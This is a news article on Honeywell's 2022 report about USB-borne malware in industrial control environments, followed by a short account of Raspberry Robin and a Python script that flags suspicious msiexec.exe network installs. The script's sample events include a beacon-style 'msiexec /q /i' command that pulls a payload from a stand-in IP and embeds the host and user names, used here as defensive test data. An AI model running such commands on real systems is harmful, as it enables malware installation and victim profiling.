USB removable media threats continue as serious concern, as ICS increasingly under attack from hackers

Honeywell found that 52 percent of the threats it detected were specifically designed to use removable media, up from 37 percent the previous year and more than double the 19 percent recorded in the 2020 study, indicating that threats built to spread via USB removable media have reached a dangerously high level. Threats designed to establish remote access capabilities held steady at 51 percent, consistent with the 2021 level but still high.

“Of the threats seen, Trojans still dominated, once again comprising 76% of the malware detected,” the Honeywell report, titled ‘Industrial Cybersecurity: USB Threat Report 2022,’ said on Tuesday. “This solidifies our suspicion that adversaries are deliberately leveraging USB removable media as an initial attack vector, at which point they will attempt to establish remote connectivity to download additional payloads, exfiltrate data, and establish command and control.” 

Combined with a corresponding increase in threats targeting industrial control systems, from 30 percent to 32 percent, this again validates the theory that USB removable media are being used to penetrate the air-gapped environments found in many industrial/OT settings, the report said. Eighty-one percent of threats are capable of disrupting OT (operational technology) systems, the underlying technology used to control industrial environments, up from 79 percent in last year's report.

“This year’s report indicates that adversaries are deliberately leveraging removable media as an initial attack vector to establish remote connectivity, exfiltrate data, and establish command and control,” Jeff Zindel, vice president and general manager, Honeywell Connected Enterprise Cybersecurity, said in a press statement. “It’s now painfully clear that USB removable media are being used to penetrate industrial/OT environments, and that organizations must adopt formal programs to defend against this type of threat to avoid costly disruptions.”

Now in its fourth year, the Honeywell report found that the threats attempting to enter industrial/OT environments have continued to increase in sophistication, frequency and potential risk to operations. USB-borne malware is clearly being leveraged as part of larger cyber attack campaigns against industrial targets, and it has been adapted to exploit the ability of USB removable media to circumvent network defenses and bypass the air gaps on which many of these facilities depend for protection. Continued diligence is necessary to defend against the growing USB threat, and strong USB security controls are highly recommended.

In its report last year, Honeywell said that the global pandemic influenced how most OT organizations functioned day-to-day to accommodate new health and safety guidelines. Attempts to minimize the physical proximity of staff where possible led to an increased need for the movement of digital data. As a result, the two primary communication paths into OT – removable media and network connectivity – were under increased strain, and operators faced new operational challenges as a consequence, it added.

The Honeywell Industrial Cybersecurity USB Threat Report shows a clear trend toward cybersecurity threats becoming more prominent and potent. The report is based on aggregated, fully anonymized data from Honeywell SMX; the findings represent a consolidated view of the collective data set, and findings from the sample set are interpreted in light of their implications for the broader data set. Because Honeywell SMX analyzes USB devices as they are actively used in industrial facilities, it provides a highly focused view of industrial USB activity.

Industries represented include critical infrastructure sectors defined by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). The findings are limited to malware that has been detected and blocked. As no malware detection technology is 100 percent effective, it is possible that additional threats were not detected and, as a result, not included in the Honeywell report.

Honeywell said its findings do not prove a concerted intention to bypass air gaps in industrial systems, though it highlights an increased capability to do so. “In addition, looking at the malware samples validated another trend that first surfaced last year. The number of threats designed specifically to target industrial control systems also increased slightly year over year, up from 30% to 32%, while at the same time, the malware was more capable of causing a disruption to industrial control systems, up from 79% to 81%,” the report added.

Industrial operators must establish a clear USB security policy. Evidence indicates USB removable media is intentionally used as an initial attack vector in industrial control/OT environments. As such, technical controls and enforcement must be established to better secure USB media and peripherals.

The report also pointed to continuing evidence that new threat variants are being introduced more quickly, specifically via USB and specifically targeting the industrial sector. “To this end, existing controls should be re-examined, and patch cycles should be re-evaluated in an attempt to close the MTTR. External controls to provide real-time detection and protection of key systems should be considered, as well as integrated monitoring and incident response procedures,” it added.

The Honeywell report calls for additional scrutiny of files, documents and other digital content. Inspection and detection-based controls are necessary on the primary vectors into and between protected industrial facilities, such as removable media and network connections, to improve the ability to prevent the introduction and propagation of content-based malware.

Furthermore, outbound network connectivity from process control networks must be tightly controlled and enforced by network switches, routers and firewalls. Threats that cross the air gap via USB are used to establish a toehold in industrial systems, plant backdoors and open remote access in order to install additional payloads and set up remote command-and-control.

Organizations must also keep up with security maintenance: anti-virus software deployed in process control facilities needs to be updated daily. Even then, a layered approach to threat detection that includes OT-specific threat intelligence is strongly recommended for maximum efficacy.

Because a large percentage of the threats encountered in OT environments evade detection by traditional anti-malware software, anti-malware controls must be kept current to be effective. Patching and hardening of end nodes are also necessary, given the extent of threats capable of establishing persistence and covert remote access to otherwise air-gapped systems. Hardening of OT systems is therefore a key contribution to improving incident MTTR as well.

In May, Red Canary Intelligence reported tracking a cluster of malicious activity that it calls ‘Raspberry Robin’ and has observed targeting organizations with ties to technology and manufacturing, though it is not yet clear whether there are other links among the victims. Initially observed last September, the Raspberry Robin cluster of activity is often installed via USB drive. The activity cluster relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names.
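The behaviour described above, Windows Installer being used to fetch a payload over HTTP with the victim's host and user names in the request, is something a SOC can hunt for in process-creation telemetry. The following Python is an added example, not code from Honeywell, Red Canary or the Raspberry Robin write-up: it runs simple detection logic over constructed Sysmon-style events. The host names, user names and URLs are made up, and treating a non-C: drive letter as a sign of removable media is a heuristic assumption, since process-creation events do not record the drive type.

```python
"""Flag msiexec.exe call-outs and script hosts launched from non-system drives.
Added example; not Honeywell, Red Canary or any vendor's code. The events below
are constructed Sysmon-style process-creation records, not real telemetry."""
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import urlparse

# Any http/https URL on a command line.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Heuristic only (assumption): a drive letter other than C: is treated as a
# candidate for removable media because Sysmon does not log the drive type.
NON_SYSTEM_DRIVE_RE = re.compile(r"\b([A-BD-Z]):\\", re.IGNORECASE)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


@dataclass
class ProcessEvent:
    host: str            # computer name as logged
    user: str            # DOMAIN\user as logged
    image: str           # full path of the created process
    command_line: str
    parent_image: str


@dataclass
class Finding:
    host: str
    severity: str        # "low", "medium" or "high"
    reason: str
    command_line: str


def analyze_event(ev: ProcessEvent) -> List[Finding]:
    """Return the findings for a single process-creation event."""
    findings: List[Finding] = []
    image_name = ev.image.rsplit("\\", 1)[-1].lower()
    short_user = ev.user.rsplit("\\", 1)[-1].lower()

    if image_name == "msiexec.exe":
        for url in URL_RE.findall(ev.command_line):
            # Windows Installer can install straight from a URL; inside a
            # process control network that is rarely a legitimate action.
            segments = {s.lower() for s in urlparse(url).path.split("/") if s}
            if ev.host.lower() in segments or short_user in segments:
                findings.append(Finding(ev.host, "high",
                    "msiexec fetching a URL that embeds the victim host/user "
                    "name (Raspberry Robin-style beacon)", ev.command_line))
            else:
                findings.append(Finding(ev.host, "medium",
                    "msiexec installing from a remote URL", ev.command_line))

    m = NON_SYSTEM_DRIVE_RE.search(ev.command_line)
    if m and image_name in SCRIPT_HOSTS:
        findings.append(Finding(ev.host, "low",
            f"script host launched from non-system drive {m.group(1).upper()}: "
            "(possible removable media; heuristic)", ev.command_line))
    return findings


def triage(events: List[ProcessEvent]) -> List[Finding]:
    """Analyze a batch of events and return findings, highest severity first."""
    rank = {"high": 0, "medium": 1, "low": 2}
    found = [f for ev in events for f in analyze_event(ev)]
    return sorted(found, key=lambda f: rank[f.severity])


# Constructed sample events (hypothetical hosts, users, paths and addresses).
SAMPLE_EVENTS = [
    ProcessEvent("HMI-07", "OPS\\jdoe", r"C:\Windows\System32\msiexec.exe",
                 r'msiexec /q /i "http://203.0.113.10:8080/HMI-07/jdoe/"',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent("ENG-02", "OPS\\asmith", r"C:\Windows\System32\msiexec.exe",
                 r'msiexec /i "C:\Users\asmith\Downloads\vendor-tool.msi" /qn',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent("HMI-07", "OPS\\jdoe", r"C:\Windows\System32\cmd.exe",
                 r'cmd /c "E:\Setup\run.cmd"', r"C:\Windows\explorer.exe"),
    ProcessEvent("ENG-02", "OPS\\asmith", r"C:\Windows\System32\msiexec.exe",
                 "msiexec /q /i http://updates.example.net/patch.msi",
                 r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity.upper():6}] {f.host}: {f.reason}\n    {f.command_line}")
```

The second sample event, a quiet local install from a downloaded MSI, produces no finding, which is the point of keying on the URL rather than on msiexec.exe alone; the host/user check in the URL path is what separates a beacon of the kind described from an ordinary remote install.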
